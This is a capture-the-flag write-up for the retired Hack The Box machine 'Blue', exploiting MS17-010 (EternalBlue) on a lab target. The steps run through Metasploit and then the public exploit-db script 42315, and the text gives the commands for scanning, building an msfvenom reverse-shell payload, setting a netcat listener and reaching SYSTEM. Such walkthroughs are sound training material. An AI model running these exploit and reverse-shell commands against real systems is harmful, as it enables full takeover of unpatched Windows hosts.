Hack The Box — Blue
Blue is an easy retired machine on Hack The Box by ch4p. The vulnerability on this machine is MS17–010 also known as ‘Eternal Blue’. We exploited this machine first with a Metasploit module and then with a python exploit. This writeup will not include any passwords/cracked hashes/flags.
We will start off by running an NMAP scan against the target IP:
nmap -p- -sV -oN blue-scan 10.10.10.40
From the results we can see that ports 139 and 445 are open. We will move on to investigating SMB.
We will connect to SMB using smbclient and see what is available:
smbclient -L 10.10.10.40
We can see two disk shares called ‘Share’ and one called ‘Users’, we will look at both of these:
There is nothing in ‘Share’ so let’s try ‘Users’:
We have access to a file-share but nothing really interesting. Given the Windows version our scan picked up, we will check to see if the server is vulnerable to eternal blue:
nmap -p 139,445 --script smb-vuln-ms17-010 10.10.10.40
We can see that the host is vulnerable. We will investigate ways to exploit this vulnerability.
Exploiting SMB using Metasploit
We will start msfconsole:
And search for MS17–010:
From the results we want to load the second exploit:
Now we can look at the options:
We will set RHOST to our targets IP:
set RHOST 10.10.10.40
We will also set our payload:
set payload windows/x64/meterpreter/reverse_tcp
We will need to set our listener IP:
set LHOST 10.10.14.7
And before we run the exploit let’s use check to make sure the target is vulnerable:
Now we are ready we will run the exploit:
The exploit completes and we get a Meterpreter session:
We use the ‘shell’ command to drop into a shell and we can see that we are nt/authority system:
From here, we can get the user.txt and root.txt files.
Next, we will look at how to exploit this using a publicly available version of Eternal Blue.
Exploiting SMB — Python Script
We will use searchsploit to find an exploit:
We find a list of exploits with one matching the Windows version on our target. We will save it to our local directory:
searchsploit -m 42315
Looking at the exploit we are required to meet a few conditions and make a few adjustments. We will need to download mysmb.py, this module is imported by the exploit. We also need to adjust the payload to one that meets our needs and finally we need to add credentials, we don’t have a password but we can use the ‘guest’ login account which is enabled on the service.
We have mysmb.py in our local directory already but if needed we could download it and rename it with the following commands:
wget https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/42315.pymv 42315.py.1 mysmb.py
Next, we will generate a reverse shell executable using MSFvenom:
msfvenom -p windows/shell_reverse_tcp -f exe LHOST=10.10.14.7 LPORT=4444 > eternal-blue.exe
Now we have the reverse shell executable in our working directory we need to modify the path of the exploit in the python script. The original script looks like this:
We need to uncomment lines 922 and 923 and adjust the details to the following:
This will call to our executable payload on our attack machine and execute it once it is present on the victim.
Finally, we need to adjust the login details, we need to change the following to include, at least, a valid user. We know ‘guest’ is valid so we will use that in our adjusted script:
Next, we will setup our listener:
nc -lvnp 4444
And finally run the exploit against the target:
python 42315.py 10.10.10.40
The exploit runs:
And we can see we have a reverse shell connection to our listener as nt authority\system:
From here we can collect the proof flags and as before.